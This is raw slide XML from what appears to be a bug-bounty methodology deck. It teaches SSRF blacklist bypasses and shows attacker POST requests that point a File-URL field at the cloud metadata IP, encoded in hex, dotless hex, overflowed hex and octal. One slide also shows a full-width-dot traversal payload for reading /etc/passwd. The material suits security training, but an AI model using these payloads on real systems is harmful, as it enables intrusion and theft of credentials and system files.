            <a:ext cx="503200" cy="36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99999"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg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67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="281400" y="1389075"/>
            <a:ext cx="8862600" cy="10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b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try To Use </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dotted Hexadecimal</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://0xA9.0xFE.0xA9.0xFE/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Bypass Blacklist</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="567" name="Google Shape;567;p67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3136000" y="2675525"/>
            <a:ext cx="4973700" cy="2071500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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POST /Interaction-File-URL HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: www.company.com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User-Agent: Mozilla/5.0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Content-Type: application/x-www-form-urlencoded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Referer: https://previous.com/path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Origin: https://www.company.com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Content-Length: Number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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://0xA9.0xFE.0xA9.0xFE/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="568" name="Google Shape;568;p67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287950" y="881988"/>
            <a:ext cx="1649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  <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="434343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569" name="Google Shape;569;p67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2029975" y="364188"/>
            <a:ext cx="32700" cy="670500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343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0" name="Google Shape;570;p67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2437300" y="516900"/>
            <a:ext cx="6371100" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>My Methodology</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="571" name="Google Shape;571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538" y="-146801"/>
            <a:ext cx="1216525" cy="1181500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="572" name="Google Shape;572;p67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="2621200"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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Video</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="573" name="Google Shape;573;p6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2938" y="2675525"/>
            <a:ext cx="503200" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="574" name="Google Shape;574;p67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="3040625"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:u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Writeup</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="575" name="Google Shape;575;p6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64025" y="3091500"/>
            <a:ext cx="421000" cy="34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99999"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg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68"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="281400" y="1389075"/>
            <a:ext cx="8862600" cy="10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b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try To Use </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dotless Hexadecimal e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://0xA9FEA9FE/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Bypass Blacklist</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="581" name="Google Shape;581;p68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3136000" y="2675525"/>
            <a:ext cx="4973700" cy="2071500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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POST /Interaction-File-URL HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: www.company.com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User-Agent: Mozilla/5.0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Content-Type: application/x-www-form-urlencoded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Referer: https://previous.com/path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Origin: https://www.company.com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Content-Length: Number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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://0xA9FEA9FE/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="582" name="Google Shape;582;p68"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287950" y="881988"/>
            <a:ext cx="1649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  <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="434343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583" name="Google Shape;583;p68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2029975" y="364188"/>
            <a:ext cx="32700" cy="670500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343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4" name="Google Shape;584;p68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2437300" y="516900"/>
            <a:ext cx="6371100" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>My Methodology</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="585" name="Google Shape;585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538" y="-146801"/>
            <a:ext cx="1216525" cy="1181500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="586" name="Google Shape;586;p68"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="2621200"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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Video</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="587" name="Google Shape;587;p6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2938" y="2675525"/>
            <a:ext cx="503200" cy="36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99999"/>
        </a:soli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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="281400" y="1389075"/>
            <a:ext cx="8862600" cy="10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b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Use Chineese Separator </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%E3%80%82 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Instead Of DOT </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e.g. %E3%80%82%E3%80%82/etc/passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To Get Content Of etc/passwd</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="230" name="Google Shape;230;p42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287950" y="881988"/>
            <a:ext cx="1649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  <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="434343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31" name="Google Shape;231;p42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2029975" y="364188"/>
            <a:ext cx="32700" cy="670500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343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42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2437300" y="516900"/>
            <a:ext cx="6371100" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>My Methodology</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="233" name="Google Shape;23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538" y="-146801"/>
            <a:ext cx="1216525" cy="1181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42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="2621200"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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Tweet</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="235" name="Google Shape;235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2925" y="2675525"/>
            <a:ext cx="503200" cy="36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36000" y="2675525"/>
            <a:ext cx="4973701" cy="207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99999"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg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69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="281400" y="1389075"/>
            <a:ext cx="8862600" cy="10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b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try To Use </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dotless Hexadecimal </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>With Overflow</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://0x41414141A9FEA9FE/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Bypass Blacklist</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="593" name="Google Shape;593;p69"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3136000" y="2675525"/>
            <a:ext cx="4973700" cy="2071500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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POST /Interaction-File-URL HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: www.company.com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User-Agent: Mozilla/5.0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Content-Type: application/x-www-form-urlencoded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Referer: https://previous.com/path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Origin: https://www.company.com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Content-Length: Number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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://0x41414141A9FEA9FE/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="594" name="Google Shape;594;p69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287950" y="881988"/>
            <a:ext cx="1649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  <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="434343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595" name="Google Shape;595;p69"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2029975" y="364188"/>
            <a:ext cx="32700" cy="670500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343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6" name="Google Shape;596;p69"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2437300" y="516900"/>
            <a:ext cx="6371100" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>My Methodology</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="597" name="Google Shape;597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538" y="-146801"/>
            <a:ext cx="1216525" cy="1181500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="598" name="Google Shape;598;p69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="2621200"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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Video</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="599" name="Google Shape;599;p6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2938" y="2675525"/>
            <a:ext cx="503200" cy="36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99999"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg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70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="281400" y="1389075"/>
            <a:ext cx="8862600" cy="10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b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try To Use </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dotted Octal</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://0251.0376.0251.0376/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Bypass Blacklist</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="605" name="Google Shape;605;p70"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3136000" y="2675525"/>
            <a:ext cx="4973700" cy="2071500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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POST /Interaction-File-URL HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: www.company.com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User-Agent: Mozilla/5.0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Content-Type: application/x-www-form-urlencoded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Referer: https://previous.com/path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Origin: https://www.company.com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Content-Length: Number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File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://0251.0376.0251.0376/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="606" name="Google Shape;606;p70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287950" y="881988"/>
            <a:ext cx="1649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  <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="434343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607" name="Google Shape;607;p70"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2029975" y="364188"/>
            <a:ext cx="32700" cy="670500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343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8" name="Google Shape;608;p70"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2437300" y="516900"/>
            <a:ext cx="6371100" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>My Methodology</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="609" name="Google Shape;609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538" y="-146801"/>
            <a:ext cx="1216525" cy="1181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0" name="Google Shape;610;p70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="2621200"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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Video</a:t>
            </a:r>
